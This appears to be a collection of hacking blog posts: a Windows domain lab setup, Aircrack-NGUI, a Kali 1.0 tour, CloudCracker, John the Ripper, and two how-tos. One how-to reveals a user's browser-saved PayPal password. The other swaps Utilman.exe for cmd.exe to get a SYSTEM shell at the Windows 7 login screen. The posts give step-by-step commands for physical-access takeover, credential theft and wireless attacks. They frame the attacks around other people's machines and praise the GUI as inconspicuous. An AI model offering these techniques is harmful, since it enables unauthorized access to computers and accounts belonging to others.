Eli the Computer Guy

Learning how to hack into systems and networks requires knowledge and understanding of how systems work in the first place, the best way to learn is by setting up your own private network with systems on it.

This is the way I have learned and have found it the most effective way of grasping concepts and thinking about ways of exploitation. We will be covering the following topics:

• Installing Operating Systems
• Configuring Network Settings (For Intercommunication)
• Setting Up Windows Server 2008 (Domain Controller Roles)
• Adding User Accounts In Active Directory
• Joining Windows  Instances to the Domain

Tools Needed:

• Virtual Box Found Here
• Kali Linux 1.0 Found Here
• Copy Of Windows XP SP3 Found Here
• Copy Of Windows 7 64bit or 32bit
• Copy Of Server 2008 Found Here  I recommend using Enterprise Edition.

Licensing Information:

Virtual Box from Oracle is free for personal use.

Windows XP – Ensure you have the proper product key needed  to activate Windows (Or Use Trial)

Windows 7 – Ensure you have the proper product key needed to activate Windows (Or Use Trial)

Server 2008 – Ensure you have the proper product key needed to activate Windows (Or Use Trial)

The first thing we need to do is install our operating systems, we are going to be installing Windows 7, Windows XP (SP3), Kali Linux, and Server 2008. Installation is pretty simple and straight forward in Virtual Box.

For demo purposes we are going to install Windows 7 first step by step, once you get a handle on the installation of Windows 7 it’s the same for all the other operating systems we are going to install.

I. Installing The Operating Systems

Step One: In Virtual Box click on the “New’ button to start the process of installing a new operating system. For this blog we are going to be installing XP, the process is the same for each OS. (Shown Below)

Step Two: Enter a name for the operating system, we are going to use Windows XP Pro SP3, make sure the Type is Microsoft Windows and the Version is Windows XP. After that click next (Shown Below)

Step Three: We are ready to select the size of memory we would like to allocate to this instance, set it to 512MB to be on the safe side and click next (Shown Below)

*512MB Should be okay for each OS, Kali Linux can get by on 256MB this is on a 4GB Core i5 Laptop

Step Four: We are ready to select the type of hard drive we are going to be using on this machine, I just leave it as the default “Create a virtual hard drive now” and press Create. (Shown Below)

Step Five: The type of virtual hard drive we are going to select is the default “VDI (VirtualBox Disk Image) select that and click Next (Shown Below)

Step Six: Select the directory in which you would like to save the virtual machine instance and also select the size of the virtual hard drive, since this is Windows XP 10GB should be sufficient. When installing Windows 7 or Server 2008 I recommend at least 25GB to each operating system. (Shown Below)

Step Seven: Now that we have pre configured Virtual Box for Windows XP, it is time point Virtual Box to our ISO file and boot it up so that we can initialize the Windows XP setup wizard. Highlight the new instance created and select Settings. (Shown Below)

Step Eight: Within the settings page, select “Storage” on the left hand side and then select the disc with the green plus sign in front of it (Shown Below)

Step Nine: Select Choose disk and browse to the Windows XP SP3 ISO image, it is now mounted as our CD-ROM device in Virtual Box. Now all we need to do is Start the instance and we will begin the Windows XP Setup wizard.

Repeat this process for all other operating systems you would like to run, these steps are the same for Windows 7, Windows Server 2008, Kali Linux etc etc…

II. Network Configuration

We want our operating systems to communicate with one another in our virtualized lab this can be done by configuring a few settings both within Virtual Box and the operating systems themselves.

Right click the instance and select settings from there go to network. Make sure Enable Network Adapter is checked off, next we want to select the drop down menu next to Attached to: and use Internal Network, we also want to specify a name for our virtual network (Shown Below)

Do this the same for all of our instances this will ensure that all of our different systems can talk to one another on the network just to make things easy for the time being.

III. Setting Up Server 2008 Server Roles

I am going to assume you know you how to setup a default 2008 server system we are going to cover installing and configuring the Roles, this includes Active Directory Services and DHCP services, it’s going to be our domains authentication / security /  IP handling server.

*Make sure you remember your administrator credentials you set while installing 2008 Server Enterprise, you will need them later to join our hosts to the domain.

Step One:  Click start and select Server Manager, inside the server manager right click on Roles and then select “Add Roles” You will then get an Add Roles window select Active Directory Domain Services (Shown Below)

Only Active Directory can be installed by itself so do not try and install DHCP along with it, it won’t let you proceed past this point. Click next, next and then install (Shown Below)

Once complete Server 2008 will reboot and Active Directory will be installed now we need to repeat the same process and install DHCP this time around. DHCP will allow our other OS instances to get IP addresses from our Server 2008 machine. (Shown Below)

You will get a message about the server not detecting a static IP being assigned, ignore this for now and continue we will assign a static IP address afterwards. It will ask us to provide a top level domain, name this whatever you’d like your domain name to be. Also provide it will the DNS IP address 10.1.10.1 we will assign our server this IP address statically so it never changes. (Shown Below)

Next you will be asked if anything is using WINS on the network choose No, and click next. We then will need to provide our DHCP scope for our lab we are going to set our scope from 10.0.0.1 – 10.255.255.254 with a subnet mask of 255.0.0.0 This is a standard Class A network that most enterprise class Cisco routers use.

It will ask you about IPv6 Stateless mode, make sure to DISABLE it as we will not have any IPv6 clients right now. Once finished we will have a summary screen and it should look something like this (Shown Below)

IV. Assigning Static IP Addresses

It’s important to assign static IP addresses because if we are going to be using this server as a Domain Controller all the hosts that authenticate to the domain will always need to be able to communicate with this server. Assigning a static IP address does just that.

Step One: Go to control panel and into Network Connections from there select your network interface card and right click it and select Properties (Shown Below)

Step Two: Select Internet Protocal in the window and select Properties, in there we need to configure a few settings. Make sure “Use The Following IP” is selected and plug in the settings shown below.

Click Ok and reboot the server, as you can see we are assigning an IP address of 10.0.0.1 with a Subnet mask of 255.0.0.0 and DNS pointed at 10.0.0.1. That’s it for assigning static IP addresses this is the same in Windows 7 and in Windows XP.

V. Running DC Promo & Configuring AD

We need to promote our 2008 Server into an actual domain controller ready to authenticate our users and computers to the domain. The first thing we need to do is click Start and type “dcpromo” without quotes and press enter.  This will begin the wizard for setting up our Active Directory structure.

Click next until you get to a window asking if you want to join an existing domain or create a new one, select create a new domain in a new forest and press next (Shown Below)

Next the wizard is going to ask at what fuctioning level do we want this DC to operate at. We don’t have any legacy domain controller or software so we can just use Windows Server 2008 and click next (Shown Below)

Click next through the menus and then set a Recovery Mode password incase there is a disaster in the future. (Shown Below)

One last reboot will be required, but now we have a brand new domain controller and our very own virtual domain to fuxx with! Now we need to add user accounts so our hosts can authenticate to the domain.

VI. Adding Snap-Ins / Adding User Accounts To Active Directory

We need to customize our Microsoft Management Console this is the console used to navigate to different services running on the server and make changes if necessary.

Click Start and type “mmc” without quotes and press enter. This will open up the Microsoft Management Console. Once inside select File at the top and select “Add Snap-Ins” (Shown Below)

We are going to add 3 Snap Ins, Active Directory Users And Computers, DHCP, and DNS. highlight them and click Add they will then be added to the right column. Click Ok(Shown Below)

Your MMC console should look like the one shown below, we are going to be adding users now.

Click the plus sign next to Active Directory Users and Computers, then click the plus sign next to our domain nullsetcomputerco.com in our case. After that go down to Users and right click hover over “new” and then select User. (Shown Below)

Add the name of the user, and the login credentials you want them to use to authenticate to the domain. We are going to use Tom Hanks as an example of this (Shown Below)

Click next and then set a password for the new user, we haven’t specified password strength policy for our DC so it doesn’t have to be complex. Make sure to uncheck User has to change password.(Shown Below)

Again click next, now are user is setup on the domain and we are now ready to join our other instances to the domain controller.

VI. Joining Windows Instances To The Domain

We are finally ready to add our computers to the domain. Let’s go over to Windows XP instance and join it to the domain (The Domain Controller Instance Must Be Running!)

The first thing we want to do is make sure that our Windows XP instance has communication with our domain controller on the network. open up a command prompt and ping 10.0.0.1 that is the IP address we statically assigned to our server we are getting replies from the server so that is a good sign. (Shown Below)

After we have verified we have connectivity between the two operating systems we can proceed to the next step. Right click on My Computer and go to properties, once open navigate to the Computer Name tab click Change and enter the domain name that you setup in Server 2008 nullsetcomputerco.com for this example. Enter the Administrator username and password for the Domain Controller not the local machine. (Shown Below)

Once you have entered the correct credentials you will be greeted and welcomed to the domain. (Shown Below)

That’s it! Now just repeat the same steps for your Windows 7 instance so that it can login to the domain. (You can add users to the Domain Controller for Windows 7)

Note: We can also download distributions of firewalls like PFSense to install and configure on our network if we want to make it more authentic, we could also setup an Apache web server or SQL server to exploit for the future.

Thanks for reading don’t be evil!

What Is It:?

Aircrack-NGUI is a combination of the words “Aircrack-NG” and “GUI”. In short, it’s a program written in Java that provides a graphical interface to many hacking tools available for the GNU/Linux operating system. At the core of these tools lie the Aircrack-NG suite (airodump-ng, aircrack-ng, aireplay-ng, etc.), Nmap or Network Map, and the Dsniff suite (arpspoof, dsniff, mailsnarf, urlsnarf, etc.)

Aircrack-NGUI was designed for people who either aren’t very skilled when it comes to using the terminal or those who don’t type very fast but still want to hack quickly. The developer of Aircrack-NGUI also has plans for it to be a learning and scripting tool, so that you can perform your hacking in the program but then save the program calls and arguments it uses to a text file for you to review and learn from or convert to a script.

Tools Needed:

• Distribution Of Linux (Ubuntu, Kali etc)
• Aircrack NGUI Found Here

Why Should You Use Aircrack NGUI?:

Aircrack-NGUI provides many benefits to hackers, not just from its graphical nature. It allows you to save commonly used “profiles” in the program so you can save configurations and pull them up quickly. For example, on the Discover Networks screen, you can have a profile for capturing WEP network information.

Whenever you need to capture, you can select the profile instead of remembering all of the arguments that you need to set. Also, NGUI is really proficient at sending information from screen to screen. If you want to de-authenticate client computers on a network using airodump-ng (find the network) and aireplay-ng (attack the network), you can use the Discover Networks screen to find the network, right-click the network in question, and click “De-authenticate” and it will load a Replay/Inject Packets screen with the right information populated.

So it’s select, right-click, attack, GO. The need for copying and pasting has been minimized as much as possible within the program. Finally, you get the comfort of a graphical interface behind you. Many hackers enjoy the terminal because it lets them choose exactly what they want and is customizable. The problem is that many non-hackers will view the terminal (black box, white text) as hacking and might report you just for having that magical box open. Not many users question a GUI, no matter if they know what it does or not.

How do I use Aircrack-NGUI?:

In order to use Aircrack-NGUI, you must first be running a Linux-based operating system. This includes (but is not limited to) Ubuntu (and all of its varients), Fedora, BackTrack 5, and Kali. (Note: Compatibility with Kali has not been tested yet. Try with caution.) It doesn’t matter if you’re running it on your hard disk or from a LiveCD. Once you have your Linux system loaded, go to the link above and click on the Downloads tab. Download the first zip file in the list and extract it to one of your folders. Open up a terminal and change into the directory with the extracted files. From there, type:

In Ubuntu:

sudo java -jar AircrackNGUI.jar

In Fedora:

su -c ‘java -jar AircrackNGUI.jar’

In BackTrack 5/Kali:

java -jar AircrackNGUI.jar

You will need the Java Runtime Environment (JRE) installed in order to run the software. From there, the program will launch and display the following:

This is the main window of Aircrack-NGUI. The menus at the top allow you to select which tool you want to use.

A list of your registered network devices will appear on the left-side of the screen. If you select a device, its information will appear on the right. If you click on a setting title, it will prompt you to change it. You can also copy the values to your clipboard using the Copy To Clipboard dropdown.

You can save your configuration settings to a file using the “Save to Config…” button. Finally, to create a virtual monitor mode interface click “Create Monitor Interface” (requires aircrack-ng installed and configured!). To destroy a monitor-mode interface, click “Destroy Monitor Interface”. (Shown Below)

From this point, you have the program setup and hardware configured for some wireless destruction! Here’s a breakdown of your different options:

• Discover->Discover Networks: Combines airodump-ng and wash to find wireless networks and which ones are vulnerable for WPS pin guessing (used alongside Reaver).
• Discover->Discover Hosts: Allows you to scan a network or a specific IP for open ports and networking information.
• Discover->Graph Network: Create a graphical representation of a network using airgraph-ng.
• Discover->WPA Dictionary: Create a dictionary to speed up the cracking of WPA handshakes

Greyed-out menu options mean that you don’t have the appropriate programs installed to use the feature, or the feature hasn’t been developed yet (most of these are under the Other Tools dropdown). If you have a program installed but it’s greyed out, use the Settings page (Setup->Settings).

If you’re using BackTrack 5, click the “Default BT5 Settings” button and the settings will auto-populate to match that configuration. If you’re on another system, you’ll need to set the settings yourself. If you added the program to your path variable leave it at “IN PATH”. If it’s in a specific directory, change it to “DIRECTORY” and a textbox will appear for you to provide the path. Once you have your settings configured, click “Save”.

Click on Setup->Network Devices to configure your hardware for hacking.

• Attack->Replay/Inject Packets: Send packets to routers to force them to spill the goods!
• Attack->Crack WEP/WPA Key: Take captured network information to find the password to a network
• Attack->Forge Packets: Create new packets from packets captured
• Attack->ARP Poison Routing: Perform a man-in-the-middle attack with ease using arpspoof
• Attack->Sniff Passwords: Sniff passwords from a victim machine from a man-in-the-middle attack.

And that’s just the beginning! There are more tools available under the Other Tools dropdown and in context menus of the above listed features.

Conclusion:

Aircrack-NGUI is a great tool for those who need an inconspicuous, fast tool with lots of room for learning and improvement. Not to mention, it’s free to use and re-distribute! If you have a recommendation for the writer, feel free to create an Issue on his Bitbucket repository page.

Thanks for reading, don’t be evil!

It looks like the development team over at Offensive Security will not be releasing a Backtrack 6, but are introducing a new more mature and polished product.

Enter Kali Linux 1.0 touting over 300 tools and a complete UI overhaul, it looks very clean and minimalistic. It was in secret development for years and has finally been released.

It’s running Debian XFCE If you are interested in getting a copy, it can be found Here. It comes with GViM as the default text editor and Ice Weasel as the default web browser.

Here is a shot of the new desktop interface (Shown Below) You may click for a larger preview!

Let’s take a look at some of the new tools and menus that have been added. The first thing you will notice is all the standard applications and accessories that you would expect to come pre-installed.  (Shown Below)

Underneath we Accessories we have Electronics, this appears to contain the Arduino IDE for development and I’m sure tinkering with Arduino boards pretty sweet! (Shown Below)

Moving right on down the list we have Graphics this has your standard Document Viewer and Image Viewer (Shown Below)

Alright, enough with the boring stuff let’s now take a look at some of the new menu’s and tools that come with Kali Linux. The first thing we will notice under “Kali Linux” is a new menu called “Top 10 Security Tools” as you would expect it contains tools like Aircrack, Hydra, Metasploit, WireShark and SQLMap etc, etc.. (Shown Below)

Just below that we have Information gathering with all kinds of different sub categories SMB Analysis, DNS Analysis, IDS/IPS Identification just to name a few. I’m not going to screen shot every sub menu as it would take forever. (Shown Below)

Moving right on down the list is Vulnerability Analysis, this has things for finding vulnerabilities in things such as databases, cisco equipment, scanners etc.. (Shown Below)

I’m not going to go through every sub menu like I said before, but I did want to show you something new. We have Hardware Hacking now this is both for Android and Arduino we now have tools to hack into Arduino boards and Android phones! (Shown Below)

I hope you enjoyed reading this brief walkthrough of the new Kali Linux 1.0 and as always don’t be evil!

I would also like to note that while running the new OS I tested a few different wireless cards including a NetGear and an ALFA Networks wireless cards both works without a hitch, overall the new OS seems stable and responsive. Very good for a 1.0 release.

What Is It?:

Cloud Cracker is an online password cracking service for penetration testers and network auditors who need to check the security of WPA protected wireless networks, crack password hashes, or break document encryption.

This is really an excellent idea and it was only a matter of time until someone thought of the ability to crack passwords within the cloud. Yes it does cost a little bit of change but you are getting a lot for your money in my opinion :)

Tools Needed:

• Web Browser https://www.cloudcracker.com/
• NTLM / WPA / WPA2 / MD-5 / MS-CHAPV2 Hash Dump

This website is extremely easy to use simply open a browser and direct yourself to https://www.cloudcracker.com/ once you are on the website you will be presented with an upload box. (Shown Below)

To begin, simply select the file type of the hash you are trying to crack whether that be WPA or NTLM or even MD5 it supports quite a bit of different encryption types even MS-CHAPV2 for cracking Point To Point Tunneling Protocol (PPTP). Shown Below

After we have selected the type of encryption we are going to use, we simply need to upload the hash dump file that we have. Click  “Choose File” and find your hash dump file. For demo purposes we are going to use an NTLM hash dump from a domain controller. (Shown Below)

Cloud Cracker will tell you if your hashdump file is not in the correct format, the hash dump should look like this for Windows Vista and later Administrator:500:NO PASSWORD*********************:0CB6948805F797BF2A82807973B89537::: After the file has been uploaded simply click next. You will then be greeted with the Dictionary screen (Shown Below)

Today I am going to show you a simple trick to reveal hidden passwords that have been saved on a computer. A lot of people have the web browser remember their credentials for convenience with just a few simple steps we can reveal what the saved password is. Let’s take a look

Tools Needed:

• Web Browser With Debugging (Chrome Or FireFox)

The first thing we need to do is find a page where credentials are stored in the browser for this blog we are going to use PayPal as an example. (Shown Below)

As we can see this user has saved their credentials in the web browser so that they can simply just login, but what if we needed to know what that password was? Maybe they use the same password on all of their other logins? The first thing we want to do is right click in the password field and select “Inspect Element” (Shown Below)

Once we are in the debugging console in Google Chrome we are going to look at a specific section of the code that comes up it looks like this <input type=”password” id=”login_password” name=”login_password” (Shown Below)

We are going to simply double click the “password” field next to <input type= and enter “clear text” without quotes. And Press enter(Shown Below)

After we hit enter the browser will now show the hidden password, revealing it in clear text (Show Below) This should work all saved passwords in login fields.

I hope you enjoyed reading this blog, and as always don’t be evil!

Today I am going to show you a clever little trick that can be used on Windows 7 machines, this type of exploit only works if you have physical access to the computer you are trying to compromise. It requires knowledge of a few basic Linux commands and just a minute or two of time.

Tools Needed:

• Backtrack 5 DVD or Thumbdrive
• Windows 7 Workstation

To begin I will explain what makes this exploit possible, Windows 7 has a feature that comes installed called “Ease of Access” this utility can be used by pressing the Windows Key + U. The utility works and can be activated on the computer even if a user is not logged in or has locked their workstation. (Shown Below)

First you will need to power down the workstation and insert your Backtrack DVD or Thumbdrive and get into the boot menu of the computer almost always the F12 Key. Once we are booted up inside of Backtrack let’s open up a terminal and take a look at the Windows directories on the local machine. type “fdisk -l” without quotes and press enter. (Shown Below)

This will give us a list of all of our disks for this demo we are focusing on the NTFS file system since this is a Windows 7 Machine it is shown as “hda1”. Let’s go into our mount folder type “cd /mnt” without quotes and press enter. After that, in our mount folder we are going to make a directory called hda1 just to keep things simple. Type “mkdir hda1” without quotes and press enter.

Now we want to mount the /dev/hda1 drive into the newly created directory. Type “mount /dev/hda1 /mnt/hda1” without quotes and press enter. It will then copy the files over to our new directory if we type “ls” without quotes and we will have all of the windows files in that directory (Shown Below)

The Ease of Access utility is called “Utilman.exe” and it resides in the system32 folder. Type “cd system32” without quotes and press enter. Now that we are in the system 32 directory we need to type “mv Utilman.exe Utilman.old” without quotes and press enter.

The command prompt is also in this same directory so we are going to copy it over essentially replacing the Utilman.exe with cmd.exe. Type “cp cmd.exe Utilman.exe” without quotes and press enter.

Alright all of our commands have been executed hopefully successfully, all we need to do now is reboot the workstation type “reboot” without quotes and press enter. Now the fun part comes when we are presented back with the Windows 7 Login screen.

All we need to do is press Windows Key + U and we are greeted with a command prompt running as “SYSTEM” which has NT Authority. This also means we can run explorer.exe, and when we run it we get a fully functional task bar. (Shown Below)

That’s it, I hope you enjoyed this blog, and as always don’t be evil!    ** Note I had to take a picture of the desktop at a client’s when I was testing the exploit**

What is It?:

John the Ripper is a free password cracking software tool. Initially developed for the UNIX operating system, it currently runs on fifteen different platforms (eleven architecture-specific flavors of Unix, DOS, Win32, BeOS, and OpenVMS).

It is one of the most popular password testing and breaking programs as it combines a number of password crackers into one package, auto detects password hash types, and includes a customizable cracker.

It can be run against various encrypted password formats including several crypt password hash types most commonly found on various Unix flavors (based on DES, MD5, or Blowfish), Kerberos AFS, and Windows NT/2000/XP/2003 LM hash. Additional modules have extended its ability to include MD4-based password hashes and passwords stored in LDAP, My SQL, and others.

John The Ripper’s Modes:

• Wordlist : John will simply use a file with a list of words that will be checked against the passwords. See RULES for the format of wordlist files.
• Single crack : In this mode, john will try to crack the password using the login/GECOS information as passwords.
• Incremental : This is the most powerful mode. John will try any character combination to resolve the password. Details about these modes can be found in the MODES file in john’s documentation, including how to define your own cracking methods.

Tools Needed:

• Copy Of Backtrack 5  (John The Ripper Is Included In Backtrack 5)
• John The Ripper Found Here

The first thing we need to do is get a list of hashes from somewhere, for this blog and for demo purposes we are going to use one from NetForce security training. Click Here For Link! (Shown Below)

The hash dump that we are going to be focused on in this blog is the one that has NetForce in the name and a DES encrypted hash next to it. (Shown Below) Copy and Paste it into a text document and save it in your root folder.

Next, use the unshadow command to combines the /etc/passwd and /etc/shadow files so John can use them. You might need this since if you only used your shadow file, the GECOS information wouldn’t be used by the "single crack" mode, and also you wouldn’t be able to use the -shells option.

On a normal system you’ll need to run un-shadow as root to be able to read the shadow file. So login as root or use old good sudo. Type “sudo /usr/sbin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db” without quotes and press enter.

To use John, you just need to supply it a password file created using unshadow command along with desired options. If no mode is specified, john will try "single" first, then "wordlist" and finally "incremental" password cracking methods.
type “john /tmp/crack.password.txt” and press enter (make sure to change the directory to wherever your password hash file is located.

Our output looks like this:

john /tmp/crack.password.txt Loaded 1 password (FreeBSD MD5 [32/32] Cracking the hashes will take time, so please be patient!…

To see the crack passwords after complete type “john –show /tmp/crack.password.txt” without quotes. (Shown Below)

test:123456:1002:1002:test,,,:/home/test:/bin/bash
didi:abc123:1003:1003::/home/didi:/usr/bin/rssh
2 passwords cracked, 1 left

That’s it! I hope you enjoyed reading, and as always don’t be evil!